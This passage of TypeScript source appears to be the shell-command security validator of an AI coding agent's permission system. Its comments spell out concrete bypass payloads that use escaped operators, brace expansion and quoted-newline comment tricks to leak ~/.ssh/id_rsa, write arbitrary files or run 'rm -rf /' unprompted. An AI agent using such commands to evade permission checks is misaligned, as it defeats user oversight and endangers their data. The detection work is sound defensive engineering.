
  return {
    behavior: 'passthrough',
    message: 'No backslash-escaped whitespace',
  }
}
|
|
|
|
/**
 * Detects a backslash immediately preceding a shell operator outside of quotes.
 *
 * SECURITY: splitCommand normalizes `\;` to a bare `;` in its output string.
 * When downstream code (checkReadOnlyConstraints, checkPathConstraints, etc.)
 * re-parses that normalized string, the bare `;` is seen as an operator and
 * causes a false split. This enables arbitrary file read bypassing path checks:
 *
 *   cat safe.txt \; echo ~/.ssh/id_rsa
 *
 * In bash: ONE cat command reading safe.txt, ;, echo, ~/.ssh/id_rsa as files.
 * After splitCommand normalizes: "cat safe.txt ; echo ~/.ssh/id_rsa"
 * Nested re-parse: ["cat safe.txt", "echo ~/.ssh/id_rsa"] — both segments
 * pass isCommandReadOnly, sensitive path hidden in echo segment is never
 * validated by path constraints. Auto-allowed. Private key leaked.
 *
 * This check flags any \<operator> regardless of backslash parity. Even counts
 * (\\;) are dangerous in bash (\\ → \, ; separates). Odd counts (\;) are safe
 * in bash but trigger the double-parse bug above. Both must be flagged.
 *
 * Known false positive: `find . -exec cmd {} \;` — users will be prompted once.
 *
 * Note: `(` and `)` are NOT in this set — splitCommand preserves `\(` and `\)`
 * in its output (round-trip safe), so they don't trigger the double-parse bug.
 * This allows `find . \( -name x -o -name y \)` to pass without false positives.
 */
const SHELL_OPERATORS = new Set([';', '|', '&', '<', '>'])
|
|
|
|
function hasBackslashEscapedOperator(command: string): boolean {
|
|
let inSingleQuote = false
|
|
let inDoubleQuote = false
|
|
|
|
for (let i = 0; i < command.length; i++) {
|
|
const char = command[i]
|
|
|
|
// SECURITY: Handle backslash FIRST, before quote toggles. In bash, inside
|
|
// double quotes, `\"` is an escape sequence producing a literal `"` — it
|
|
// does NOT close the quote. If we process quote toggles first, `\"` inside
|
|
// `"..."` desyncs the tracker:
|
|
// - `\` is ignored (gated by !inDoubleQuote)
|
|
// - `"` toggles inDoubleQuote to FALSE (wrong — bash says still inside)
|
|
// - next `"` (the real closing quote) toggles BACK to TRUE — locked desync
|
|
// - subsequent `\;` is missed because !inDoubleQuote is false
|
|
// Exploit: `tac "x\"y" \; echo ~/.ssh/id_rsa` — bash runs ONE tac reading
|
|
// all args as files (leaking id_rsa), but desynced tracker misses `\;` and
|
|
// splitCommand's double-parse normalization "sees" two safe commands.
|
|
//
|
|
// Fix structure matches hasBackslashEscapedWhitespace (which was correctly
|
|
// fixed for this in commit prior to d000dfe84e): backslash check first,
|
|
// gated only by !inSingleQuote (since backslash IS literal inside '...'),
|
|
// unconditional i++ to skip the escaped char even inside double quotes.
|
|
if (char === '\\' && !inSingleQuote) {
|
|
// Only flag \<operator> when OUTSIDE double quotes (inside double quotes,
|
|
// operators like ;|&<> are already not special, so \; is harmless there).
|
|
if (!inDoubleQuote) {
|
|
const nextChar = command[i + 1]
|
|
if (nextChar && SHELL_OPERATORS.has(nextChar)) {
|
|
return true
|
|
}
|
|
}
|
|
// Skip the escaped character unconditionally. Inside double quotes, this
|
|
// correctly consumes backslash pairs: `"x\\"` → pos 6 (`\`) skips pos 7
|
|
// (`\`), then pos 8 (`"`) toggles inDoubleQuote off correctly. Without
|
|
// unconditional skip, pos 7 would see `\`, see pos 8 (`"`) as nextChar,
|
|
// skip it, and the closing quote would NEVER toggle inDoubleQuote —
|
|
// permanently desyncing and missing subsequent `\;` outside quotes.
|
|
// Exploit: `cat "x\\" \; echo /etc/passwd` — bash reads /etc/passwd.
|
|
//
|
|
// This correctly handles backslash parity: odd-count `\;` (1, 3, 5...)
|
|
// is flagged (the unpaired `\` before `;` is detected). Even-count `\\;`
|
|
// (2, 4...) is NOT flagged, which is CORRECT — bash treats `\\` as
|
|
// literal `\` and `;` as a separator, so splitCommand handles it
|
|
// normally (no double-parse bug). This matches
|
|
// hasBackslashEscapedWhitespace line ~1340.
|
|
i++
|
|
continue
|
|
}
|
|
|
|
// Quote toggles come AFTER backslash handling (backslash already skipped
|
|
// any escaped quote char, so these toggles only fire on unescaped quotes).
|
|
if (char === "'" && !inDoubleQuote) {
|
|
inSingleQuote = !inSingleQuote
|
|
continue
|
|
}
|
|
if (char === '"' && !inSingleQuote) {
|
|
inDoubleQuote = !inDoubleQuote
|
|
continue
|
|
}
|
|
}
|
|
|
|
return false
|
|
}
|
|
|
|
/**
 * Security validator: asks for confirmation when the raw command contains a
 * backslash directly before a shell operator (see hasBackslashEscapedOperator).
 *
 * @param context - Validation context; reads `treeSitter` (optional) and
 *   `originalCommand`.
 * @returns `passthrough` when tree-sitter analysis is present and reports no
 *   operator nodes, or when no backslash-escaped operator is found; otherwise
 *   an `ask` result (after logging the security-check event).
 */
function validateBackslashEscapedOperators(
  context: ValidationContext,
): PermissionResult {
  // Tree-sitter path: if tree-sitter confirms no actual operator nodes exist
  // in the AST, then any \; is just an escaped character in a word argument
  // (e.g., `find . -exec cmd {} \;`). Skip the character scan in that case,
  // which also avoids the known `find -exec` false positive.
  if (context.treeSitter && !context.treeSitter.hasActualOperatorNodes) {
    return { behavior: 'passthrough', message: 'No operator nodes in AST' }
  }

  if (hasBackslashEscapedOperator(context.originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.BACKSLASH_ESCAPED_OPERATORS,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains a backslash before a shell operator (;, |, &, <, >) which can hide command structure',
    }
  }

  return {
    behavior: 'passthrough',
    message: 'No backslash-escaped operators',
  }
}
|
|
|
|
/**
 * Checks if the character at position `pos` in `content` is escaped by
 * counting the consecutive backslashes immediately before it. An odd count
 * means the character is escaped; an even count (including zero) means the
 * backslashes pair up with each other and the character is unescaped.
 *
 * @param content - Text being scanned.
 * @param pos - Index of the character to test. Position 0, or a position
 *   with no preceding backslash, is never escaped.
 * @returns `true` when the run of backslashes ending at `pos - 1` has odd
 *   length.
 */
function isEscapedAtPosition(content: string, pos: number): boolean {
  let backslashCount = 0
  for (let i = pos - 1; i >= 0 && content[i] === '\\'; i--) {
    backslashCount++
  }
  return backslashCount % 2 === 1
}
|
|
|
|
/**
 * Detects unquoted brace expansion syntax that Bash expands but
 * shell-quote/tree-sitter treat as literal strings. This parsing discrepancy
 * allows permission bypass:
 *   git ls-remote {--upload-pack="touch /tmp/test",test}
 * Parser sees one literal arg, but Bash expands to:
 *   --upload-pack="touch /tmp/test" test
 *
 * Brace expansion has two forms:
 *   1. Comma-separated: {a,b,c} → a b c
 *   2. Sequence: {1..5} → 1 2 3 4 5
 *
 * Both single and double quotes suppress brace expansion in Bash, so the scan
 * runs on `context.fullyUnquotedPreStrip` (both quote types stripped, taken
 * BEFORE stripSafeRedirections). Backslash-escaped braces (\{, \}) also
 * suppress expansion and are ignored via isEscapedAtPosition.
 *
 * Three checks run in order, each returning `ask` and logging a distinct
 * `subId`:
 *   - subId 2: more unescaped `}` than `{` after quote stripping.
 *   - subId 3: the original command contains a quoted single brace
 *     (`'{'`, `'}'`, `"{"`, `"}"`) while unquoted `{` is also present.
 *   - subId 1: a `{...}` pair with `,` or `..` at its outermost level.
 *
 * @param context - Validation context; reads `fullyUnquotedPreStrip` and
 *   `originalCommand`.
 * @returns `ask` if any check fires, otherwise `passthrough`.
 */
function validateBraceExpansion(context: ValidationContext): PermissionResult {
  // Use pre-strip content to avoid false negatives from stripSafeRedirections
  // creating backslash adjacencies (e.g., `\>/dev/null{a,b}` → `\{a,b}` after
  // stripping, making isEscapedAtPosition think the brace is escaped).
  const content = context.fullyUnquotedPreStrip

  // SECURITY: Check for MISMATCHED brace counts in fullyUnquoted content.
  // A mismatch indicates that quoted braces (e.g., `'{'` or `"{"`) were
  // stripped by extractQuotedContent, leaving unbalanced braces in the content
  // we analyze. The depth-matching algorithm below assumes balanced braces —
  // with a mismatch, it closes at the WRONG position, missing commas that
  // bash's algorithm WOULD find.
  //
  // Exploit: `git diff {@'{'0},--output=/tmp/pwned}`
  //   - Original: 2 `{`, 2 `}` (quoted `'{'` counts as content, not operator)
  //   - fullyUnquoted: `git diff {@0},--output=/tmp/pwned}` — 1 `{`, 2 `}`!
  //   - Our depth-matcher: closes at first `}` (after `0`), inner=`@0`, no `,`
  //   - Bash (on original): quoted `{` is content; first unquoted `}` has no
  //     `,` yet → bash treats as literal content, keeps scanning → finds `,`
  //     → final `}` closes → expands to `@{0} --output=/tmp/pwned`
  //   - git writes diff to /tmp/pwned. ARBITRARY FILE WRITE, ZERO PERMISSIONS.
  //
  // Only unescaped braces are counted (backslash-escaped braces are literal
  // in bash).
  let unescapedOpenBraces = 0
  let unescapedCloseBraces = 0
  for (let i = 0; i < content.length; i++) {
    if (content[i] === '{' && !isEscapedAtPosition(content, i)) {
      unescapedOpenBraces++
    } else if (content[i] === '}' && !isEscapedAtPosition(content, i)) {
      unescapedCloseBraces++
    }
  }

  // Only block when CLOSE count EXCEEDS open count — this is the specific
  // attack signature. More `}` than `{` means a quoted `{` was stripped
  // (bash saw it as content, we see extra `}` unaccounted for). The inverse
  // (more `{` than `}`) is usually legitimate unclosed/escaped braces like
  // `{foo` or `{a,b\}` where bash doesn't expand anyway.
  if (unescapedOpenBraces > 0 && unescapedCloseBraces > unescapedOpenBraces) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.BRACE_EXPANSION,
      subId: 2,
    })
    return {
      behavior: 'ask',
      message:
        'Command has excess closing braces after quote stripping, indicating possible brace expansion obfuscation',
    }
  }

  // SECURITY (defense-in-depth): catch the quoted-brace attack primitive even
  // when an attacker balances the stripped brace counts. Heuristic: if the
  // ORIGINAL command contains a quoted single brace (`'{'`, `'}'`, `"{"`,
  // `"}"`) AND the stripped content has an unescaped `{`, treat it as
  // suspicious. Legitimate commands rarely nest quoted braces inside brace
  // expansion (awk/find patterns are fully quoted, like `awk '{print $1}'`,
  // where the OUTER brace is inside the quotes too).
  if (unescapedOpenBraces > 0) {
    const orig = context.originalCommand
    // A brace character wrapped in quotes on both sides.
    if (/['"][{}]['"]/.test(orig)) {
      logEvent('tengu_bash_security_check_triggered', {
        checkId: BASH_SECURITY_CHECK_IDS.BRACE_EXPANSION,
        subId: 3,
      })
      return {
        behavior: 'ask',
        message:
          'Command contains quoted brace character inside brace context (potential brace expansion obfuscation)',
      }
    }
  }

  // Scan for unescaped `{` characters, then check if they form brace
  // expansion. A manual scan is used rather than a regex lookbehind because
  // lookbehinds can't handle double-escaped backslashes (\\{ is unescaped `{`).
  for (let i = 0; i < content.length; i++) {
    if (content[i] !== '{') continue
    if (isEscapedAtPosition(content, i)) continue

    // Find the matching unescaped `}` by tracking nesting depth, so that
    // commas between the outer `{` and a nested one are not missed
    // (e.g., `{--upload-pack="evil",{test}}`).
    let depth = 1
    let matchingClose = -1
    for (let j = i + 1; j < content.length; j++) {
      const ch = content[j]
      if (ch === '{' && !isEscapedAtPosition(content, j)) {
        depth++
      } else if (ch === '}' && !isEscapedAtPosition(content, j)) {
        depth--
        if (depth === 0) {
          matchingClose = j
          break
        }
      }
    }

    // Unclosed `{` — not an expansion at this position.
    if (matchingClose === -1) continue

    // Check for `,` or `..` at the outermost nesting level between this
    // `{` and its matching `}`. Only depth-0 triggers matter — bash splits
    // brace expansion at outer-level commas/sequences.
    let innerDepth = 0
    for (let k = i + 1; k < matchingClose; k++) {
      const ch = content[k]
      if (ch === '{' && !isEscapedAtPosition(content, k)) {
        innerDepth++
      } else if (ch === '}' && !isEscapedAtPosition(content, k)) {
        innerDepth--
      } else if (innerDepth === 0) {
        if (
          ch === ',' ||
          (ch === '.' && k + 1 < matchingClose && content[k + 1] === '.')
        ) {
          logEvent('tengu_bash_security_check_triggered', {
            checkId: BASH_SECURITY_CHECK_IDS.BRACE_EXPANSION,
            subId: 1,
          })
          return {
            behavior: 'ask',
            message:
              'Command contains brace expansion that could alter command parsing',
          }
        }
      }
    }
    // No expansion at this level — don't skip past; inner pairs will be
    // examined by subsequent iterations of the outer loop.
  }

  return {
    behavior: 'passthrough',
    message: 'No brace expansion detected',
  }
}
|
|
|
|
// Matches Unicode whitespace characters that shell-quote treats as word
// separators but bash treats as literal word content. While this differential
// is defense-favorable (shell-quote over-splits), blocking these proactively
// prevents future edge cases.
// Covered code points: U+00A0, U+1680, U+2000–U+200A, U+2028, U+2029, U+202F,
// U+205F, U+3000, U+FEFF. The regex has no `g` flag, so `.test()` is stateless.
// eslint-disable-next-line no-misleading-character-class
const UNICODE_WS_RE =
  /[\u00A0\u1680\u2000-\u200A\u2028\u2029\u202F\u205F\u3000\uFEFF]/
|
|
|
|
/**
 * Security validator: asks for confirmation when the raw command contains any
 * character matched by UNICODE_WS_RE.
 *
 * @param context - Validation context; only `originalCommand` is read.
 * @returns `ask` (after logging the security-check event) when a match is
 *   found, otherwise `passthrough`.
 */
function validateUnicodeWhitespace(
  context: ValidationContext,
): PermissionResult {
  const { originalCommand } = context
  if (UNICODE_WS_RE.test(originalCommand)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.UNICODE_WHITESPACE,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains Unicode whitespace characters that could cause parsing inconsistencies',
    }
  }
  return { behavior: 'passthrough', message: 'No Unicode whitespace' }
}
|
|
|
|
/**
 * Security validator: asks for confirmation when a `#` appears directly after
 * a non-whitespace character (mid-word hash). shell-quote treats mid-word `#`
 * as comment-start but bash treats it as a literal character, creating a
 * parser differential.
 *
 * `${#` (bash string-length syntax, e.g. `${#var}`) is excluded.
 *
 * @param context - Validation context; only `unquotedKeepQuoteChars` is read.
 * @returns `ask` (after logging the security-check event) when a mid-word
 *   `#` is found in either the raw or the continuation-joined text, otherwise
 *   `passthrough`.
 */
function validateMidWordHash(context: ValidationContext): PermissionResult {
  // unquotedKeepQuoteChars preserves quote delimiters but strips quoted
  // content, so quote-adjacent # like 'x'# is still caught.
  // fullyUnquotedPreStrip would strip both quotes and content, turning 'x'#
  // into just # (word-start).
  const { unquotedKeepQuoteChars } = context

  // SECURITY: Also check the CONTINUATION-JOINED version. The context is built
  // from the original command (pre-continuation-join). For `foo\<NL>#bar`,
  // pre-join the `#` is preceded by `\n` (whitespace → no match), but
  // post-join it's preceded by `o` (non-whitespace → match). shell-quote
  // operates on the post-join text (line continuations are joined in
  // splitCommand), so the parser differential manifests on the joined text.
  // While not directly exploitable (the `#...` fragment still prompts as its
  // own subcommand), this is a defense-in-depth gap — shell-quote would drop
  // post-`#` content from path extraction.
  //
  // Only an ODD run of backslashes before the newline is a continuation: the
  // final backslash and the newline are removed and the remaining (even)
  // backslashes are kept. An even run is left untouched.
  const joined = unquotedKeepQuoteChars.replace(/\\+\n/g, match => {
    const backslashCount = match.length - 1
    return backslashCount % 2 === 1 ? '\\'.repeat(backslashCount - 1) : match
  })

  // The lookbehind is placed immediately before `#` (not before `\S`) so that
  // it inspects the two characters directly preceding the hash. The pattern
  // has no `g` flag, so reusing it across both `.test()` calls is stateless.
  // eslint-disable-next-line custom-rules/no-lookbehind-regex -- .test() with atom search: fast when # absent
  const midWordHash = /\S(?<!\$\{)#/

  if (midWordHash.test(unquotedKeepQuoteChars) || midWordHash.test(joined)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.MID_WORD_HASH,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains mid-word # which is parsed differently by shell-quote vs bash',
    }
  }
  return { behavior: 'passthrough', message: 'No mid-word hash' }
}
|
|
|
|
/**
 * Detects when a `#` comment contains quote characters that would desync
 * downstream quote trackers (like extractQuotedContent).
 *
 * In bash, everything after an unquoted `#` on a line is a comment — quote
 * characters inside the comment are literal text, not quote toggles. But our
 * quote-tracking functions don't handle comments, so a `'` or `"` after `#`
 * toggles their quote state. Attackers can craft `# ' "` sequences that
 * precisely desync the tracker, causing subsequent content (on following
 * lines) to appear "inside quotes" when it's actually unquoted in bash.
 *
 * Example attack:
 *   echo "it's" # ' " <<'MARKER'\n
 *   rm -rf /\n
 *   MARKER
 * In bash: `#` starts a comment, `rm -rf /` executes on line 2.
 * In extractQuotedContent: the `'` after `#` opens a single quote, and the
 * `'` before MARKER closes it. But the `'` after MARKER opens ANOTHER single
 * quote, swallowing the newline and `rm -rf /`, so validateNewlines sees no
 * unquoted newlines.
 *
 * Defense: if an unquoted, unescaped `#` is followed by any quote character on
 * the same line, treat it as a misparsing concern. Note that every unquoted
 * `#` is treated as a comment start here (no word-start check), which is the
 * conservative direction. Legitimate commands rarely have quote characters in
 * their comments (and if they do, the user can approve manually).
 *
 * @param context - Validation context; reads `treeSitter` and
 *   `originalCommand`.
 * @returns `passthrough` when tree-sitter analysis is present or no such
 *   comment exists; otherwise `ask` (after logging the security-check event).
 */
function validateCommentQuoteDesync(
  context: ValidationContext,
): PermissionResult {
  // Tree-sitter path: tree-sitter correctly identifies comment nodes and
  // quoted content. The desync concern is about regex quote tracking being
  // confused by quote characters inside comments. When tree-sitter provides
  // the quote context, this desync cannot happen — the AST is authoritative
  // regardless of whether the command contains a comment.
  if (context.treeSitter) {
    return {
      behavior: 'passthrough',
      message: 'Tree-sitter quote context is authoritative',
    }
  }

  const { originalCommand } = context

  // Track quote state character-by-character: single quotes don't toggle
  // inside double quotes, and a backslash escapes the next character except
  // inside single quotes.
  let inSingleQuote = false
  let inDoubleQuote = false
  let escaped = false

  for (let i = 0; i < originalCommand.length; i++) {
    const char = originalCommand[i]

    // Character following a backslash: consumed without interpretation.
    if (escaped) {
      escaped = false
      continue
    }

    // Inside '...': only the closing quote matters; backslash is literal.
    if (inSingleQuote) {
      if (char === "'") inSingleQuote = false
      continue
    }

    if (char === '\\') {
      escaped = true
      continue
    }

    // Inside "...": only the closing quote matters. Single quotes inside
    // double quotes are literal — no toggle.
    if (inDoubleQuote) {
      if (char === '"') inDoubleQuote = false
      continue
    }

    if (char === "'") {
      inSingleQuote = true
      continue
    }

    if (char === '"') {
      inDoubleQuote = true
      continue
    }

    // Unquoted `#` — treated as a comment start. Check whether the rest of
    // the line contains quote characters that would desync other trackers.
    if (char === '#') {
      const lineEnd = originalCommand.indexOf('\n', i)
      const commentText = originalCommand.slice(
        i + 1,
        lineEnd === -1 ? originalCommand.length : lineEnd,
      )
      if (/['"]/.test(commentText)) {
        logEvent('tengu_bash_security_check_triggered', {
          checkId: BASH_SECURITY_CHECK_IDS.COMMENT_QUOTE_DESYNC,
        })
        return {
          behavior: 'ask',
          message:
            'Command contains quote characters inside a # comment which can desync quote tracking',
        }
      }
      // Skip to end of line (rest is comment). With no newline left, the
      // comment runs to the end of the command.
      if (lineEnd === -1) break
      i = lineEnd // Loop increment will move past newline
    }
  }

  return { behavior: 'passthrough', message: 'No comment quote desync' }
}
|
|
|
|
/**
 * Detects a newline inside a quoted string where the NEXT line would be
 * stripped by stripCommentLines (trimmed line starts with `#`).
 *
 * In bash, `\n` inside quotes is a literal character and part of the argument.
 * But stripCommentLines (called by stripSafeWrappers in bashPermissions before
 * path validation and rule matching) processes commands LINE-BY-LINE via
 * `command.split('\n')` without tracking quote state. A quoted newline lets an
 * attacker position the next line to start with `#` (after trim), causing
 * stripCommentLines to drop that line entirely — hiding sensitive paths or
 * arguments from path validation and permission rule matching.
 *
 * Example attack (auto-allowed in acceptEdits mode without any Bash rules):
 *   mv ./decoy '<\n>#' ~/.ssh/id_rsa ./exfil_dir
 * Bash: moves ./decoy AND ~/.ssh/id_rsa into ./exfil_dir/ (errors on `\n#`).
 * stripSafeWrappers: line 2 starts with `#` → stripped → "mv ./decoy '".
 * shell-quote: drops unbalanced trailing quote → ["mv", "./decoy"].
 * checkPathConstraints: only sees ./decoy (in cwd) → passthrough.
 * acceptEdits mode: mv with all-cwd paths → ALLOW. Zero clicks, no warning.
 *
 * Also works with cp (exfil), rm/rm -rf (delete arbitrary files/dirs).
 *
 * The same differential exists for a BACKSLASH-newline inside double quotes
 * (`mv ./decoy "\<\n>#" ~/.ssh/id_rsa ./exfil_dir`): bash removes the
 * `\<newline>` pair as a line continuation and stays inside the quotes, but a
 * raw `split('\n')` still starts a new line at that newline. That case is
 * therefore checked as well instead of being skipped as an escaped character.
 *
 * Defense: block ONLY the specific stripCommentLines trigger — a newline inside
 * quotes where the next line starts with `#` after trim. This is the minimal
 * check that catches the parser differential while preserving legitimate
 * multi-line quoted arguments (echo 'line1\nline2', grep patterns, etc.).
 * Safe heredocs ($(cat <<'EOF'...)) and git commit -m "..." are handled by
 * early validators and never reach this check.
 *
 * This validator is NOT in nonMisparsingValidators — its ask result gets
 * isBashSecurityCheckForMisparsing: true, causing an early block in the
 * permission flow at bashPermissions.ts before any line-based processing runs.
 *
 * @param context - Validation context; only `originalCommand` is read.
 * @returns `ask` (after logging the security-check event) when a quoted
 *   newline is followed by a `#`-prefixed line, otherwise `passthrough`.
 */
function validateQuotedNewline(context: ValidationContext): PermissionResult {
  const { originalCommand } = context

  // Fast path: must have both a newline byte AND a # character somewhere.
  // stripCommentLines only strips lines where trim().startsWith('#'), so
  // no # means no possible trigger.
  if (!originalCommand.includes('\n') || !originalCommand.includes('#')) {
    return { behavior: 'passthrough', message: 'No newline or no hash' }
  }

  // Track quote state:
  //   - single quotes don't toggle inside double quotes
  //   - backslash escapes the next char (but not inside single quotes)
  // stripCommentLines splits on '\n' (not \r), so only \n is treated as a
  // line separator. \r inside a line is removed by trim() and doesn't change
  // the trimmed-starts-with-# check.
  let inSingleQuote = false
  let inDoubleQuote = false
  let escaped = false

  for (let i = 0; i < originalCommand.length; i++) {
    const char = originalCommand[i]

    if (escaped) {
      escaped = false
      // SECURITY: a backslash-newline inside double quotes is a continuation
      // for bash but still a line break for split('\n'), so it must fall
      // through to the newline check below. Every other escaped character is
      // consumed without interpretation.
      if (!(char === '\n' && inDoubleQuote)) continue
    } else if (char === '\\' && !inSingleQuote) {
      escaped = true
      continue
    } else if (char === "'" && !inDoubleQuote) {
      inSingleQuote = !inSingleQuote
      continue
    } else if (char === '"' && !inSingleQuote) {
      inDoubleQuote = !inDoubleQuote
      continue
    }

    // A newline inside quotes: the NEXT line (from bash's perspective) starts
    // inside a quoted string. Check if that line would be stripped by
    // stripCommentLines — i.e., after trim(), does it start with `#`?
    // This mirrors: lines.filter(l => !l.trim().startsWith('#'))
    if (char === '\n' && (inSingleQuote || inDoubleQuote)) {
      const lineStart = i + 1
      const nextNewline = originalCommand.indexOf('\n', lineStart)
      const lineEnd = nextNewline === -1 ? originalCommand.length : nextNewline
      const nextLine = originalCommand.slice(lineStart, lineEnd)
      if (nextLine.trim().startsWith('#')) {
        logEvent('tengu_bash_security_check_triggered', {
          checkId: BASH_SECURITY_CHECK_IDS.QUOTED_NEWLINE,
        })
        return {
          behavior: 'ask',
          message:
            'Command contains a quoted newline followed by a #-prefixed line, which can hide arguments from line-based permission checks',
        }
      }
    }
  }

  return { behavior: 'passthrough', message: 'No quoted newline-hash pattern' }
}
|
|
|
|
/**
 * Validates that the command doesn't use Zsh-specific dangerous commands that
 * can bypass security checks. These commands provide capabilities like loading
 * kernel modules, raw file I/O, network access, and pseudo-terminal execution
 * that circumvent normal permission checks.
 *
 * The base command is the first whitespace-separated token that is neither an
 * env var assignment (`VAR=value`) nor a Zsh precommand modifier
 * (`command`, `builtin`, `noglob`, `nocorrect`). It is flagged when it is a
 * member of ZSH_DANGEROUS_COMMANDS (subId 1), or when it is `fc` and the
 * command contains a dash-option including the letter `e` (subId 2).
 *
 * NOTE(review): the original header says `emulate` (eval-equivalent with
 * `-c`) is also caught; presumably it is listed in ZSH_DANGEROUS_COMMANDS,
 * which is defined outside this block — confirm.
 *
 * @param context - Validation context; only `originalCommand` is read.
 * @returns `ask` (after logging the security-check event) when a dangerous
 *   command is detected, otherwise `passthrough`.
 */
function validateZshDangerousCommands(
  context: ValidationContext,
): PermissionResult {
  const { originalCommand } = context

  // Extract the base command from the original command, stripping leading
  // whitespace, env var assignments, and Zsh precommand modifiers.
  // e.g., "FOO=bar command builtin zmodload" -> "zmodload"
  const ZSH_PRECOMMAND_MODIFIERS = new Set([
    'command',
    'builtin',
    'noglob',
    'nocorrect',
  ])
  const trimmed = originalCommand.trim()
  const tokens = trimmed.split(/\s+/)
  let baseCmd = ''
  for (const token of tokens) {
    // Skip env var assignments (VAR=value)
    if (/^[A-Za-z_]\w*=/.test(token)) continue
    // Skip Zsh precommand modifiers (they don't change what command runs)
    if (ZSH_PRECOMMAND_MODIFIERS.has(token)) continue
    baseCmd = token
    break
  }

  if (ZSH_DANGEROUS_COMMANDS.has(baseCmd)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.ZSH_DANGEROUS_COMMANDS,
      subId: 1,
    })
    return {
      behavior: 'ask',
      message: `Command uses Zsh-specific '${baseCmd}' which can bypass security checks`,
    }
  }

  // Check for `fc -e` which allows executing arbitrary commands via editor.
  // fc without -e is safe (just lists history), but -e specifies an editor
  // to run on the command, effectively an eval. The pattern matches any
  // whitespace-preceded dash-option whose letters include `e`, anywhere in
  // the command (deliberately broad).
  if (baseCmd === 'fc' && /\s-\S*e/.test(trimmed)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.ZSH_DANGEROUS_COMMANDS,
      subId: 2,
    })
    return {
      behavior: 'ask',
      message:
        "Command uses 'fc -e' which can execute arbitrary commands via editor",
    }
  }

  return {
    behavior: 'passthrough',
    message: 'No Zsh dangerous commands',
  }
}
|
|
|
|
// Matches non-printable control characters that have no legitimate use in shell
// commands: 0x00-0x08, 0x0B-0x0C, 0x0E-0x1F, 0x7F. Excludes tab (0x09),
// newline (0x0A), and carriage return (0x0D) which are handled by other
// validators. Bash silently drops null bytes and ignores most control chars,
// so an attacker can use them to slip metacharacters past our checks while
// bash still executes them (e.g., "echo safe\x00; rm -rf /").
// The regex has no `g` flag, so `.test()` is stateless across calls.
// eslint-disable-next-line no-control-regex
const CONTROL_CHAR_RE = /[\x00-\x08\x0B\x0C\x0E-\x1F\x7F]/
|
|
|
|
/**
 * @deprecated Legacy regex/shell-quote path. Only used when tree-sitter is
 * unavailable. The primary gate is parseForSecurity (ast.ts).
 *
 * Runs the synchronous security validators over `command` in this order:
 *   1. Control-character and shell-quote single-quote-bug pre-checks.
 *   2. Early validators, which may short-circuit: an `allow` result is
 *      converted to `passthrough`; an `ask` result is returned flagged as a
 *      misparsing concern.
 *   3. Main validators. The first `ask` from a misparsing validator is
 *      returned immediately with `isBashSecurityCheckForMisparsing: true`.
 *      An `ask` from a non-misparsing validator (validateNewlines,
 *      validateRedirections) is deferred and returned only if no misparsing
 *      validator fires.
 *
 * @param command - Raw command text to validate.
 * @returns `ask` when any check fires, otherwise `passthrough`.
 */
export function bashCommandIsSafe_DEPRECATED(
  command: string,
): PermissionResult {
  // SECURITY: Block control characters before any other processing. Null bytes
  // and other non-printable chars are silently dropped by bash but confuse our
  // validators, allowing metacharacters adjacent to them to slip through.
  if (CONTROL_CHAR_RE.test(command)) {
    logEvent('tengu_bash_security_check_triggered', {
      checkId: BASH_SECURITY_CHECK_IDS.CONTROL_CHARACTERS,
    })
    return {
      behavior: 'ask',
      message:
        'Command contains non-printable control characters that could be used to bypass security checks',
      isBashSecurityCheckForMisparsing: true,
    }
  }

  // SECURITY: Detect '\' patterns that exploit shell-quote's incorrect handling
  // of backslashes inside single quotes. Must run before shell-quote parsing.
  if (hasShellQuoteSingleQuoteBug(command)) {
    return {
      behavior: 'ask',
      message:
        'Command contains single-quoted backslash pattern that could bypass security checks',
      isBashSecurityCheckForMisparsing: true,
    }
  }

  // SECURITY: Strip heredoc bodies before running security validators.
  // Only strip bodies for quoted/escaped delimiters (<<'EOF', <<\EOF) where
  // the body is literal text — $(), backticks, and ${} are NOT expanded.
  // Unquoted heredocs (<<EOF) undergo full shell expansion, so their bodies
  // may contain executable command substitutions that validators must see.
  // When extractHeredocs bails out (can't parse safely), the raw command
  // goes through all validators — which is the safe direction.
  const { processedCommand } = extractHeredocs(command, { quotedOnly: true })

  // First space-delimited token of the raw command (empty string when the
  // command starts with a space or is empty).
  const baseCommand = command.split(' ')[0] || ''
  const { withDoubleQuotes, fullyUnquoted, unquotedKeepQuoteChars } =
    extractQuotedContent(processedCommand, baseCommand === 'jq')

  const context: ValidationContext = {
    originalCommand: command,
    baseCommand,
    unquotedContent: withDoubleQuotes,
    fullyUnquotedContent: stripSafeRedirections(fullyUnquoted),
    fullyUnquotedPreStrip: fullyUnquoted,
    unquotedKeepQuoteChars,
  }

  const earlyValidators = [
    validateEmpty,
    validateIncompleteCommands,
    validateSafeCommandSubstitution,
    validateGitCommit,
  ]

  for (const validator of earlyValidators) {
    const result = validator(context)
    if (result.behavior === 'allow') {
      // An early "allow" only means this function has no objection; the
      // caller still decides, so it is reported as passthrough.
      return {
        behavior: 'passthrough',
        message:
          result.decisionReason?.type === 'other' ||
          result.decisionReason?.type === 'safetyCheck'
            ? result.decisionReason.reason
            : 'Command allowed',
      }
    }
    if (result.behavior !== 'passthrough') {
      return result.behavior === 'ask'
        ? { ...result, isBashSecurityCheckForMisparsing: true as const }
        : result
    }
  }

  // Validators that don't set isBashSecurityCheckForMisparsing — their ask
  // results go through the standard permission flow rather than being blocked
  // early. LF newlines and redirections are normal patterns that splitCommand
  // handles correctly, not misparsing concerns.
  //
  // NOTE: validateCarriageReturn is NOT here — CR IS a misparsing concern.
  // shell-quote's `[^\s]` treats CR as a word separator (JS `\s` ⊃ \r), but
  // bash IFS does NOT include CR. splitCommand collapses CR→space, which IS
  // misparsing. See validateCarriageReturn for the full attack trace.
  const nonMisparsingValidators = new Set([
    validateNewlines,
    validateRedirections,
  ])

  const validators = [
    validateJqCommand,
    validateObfuscatedFlags,
    validateShellMetacharacters,
    validateDangerousVariables,
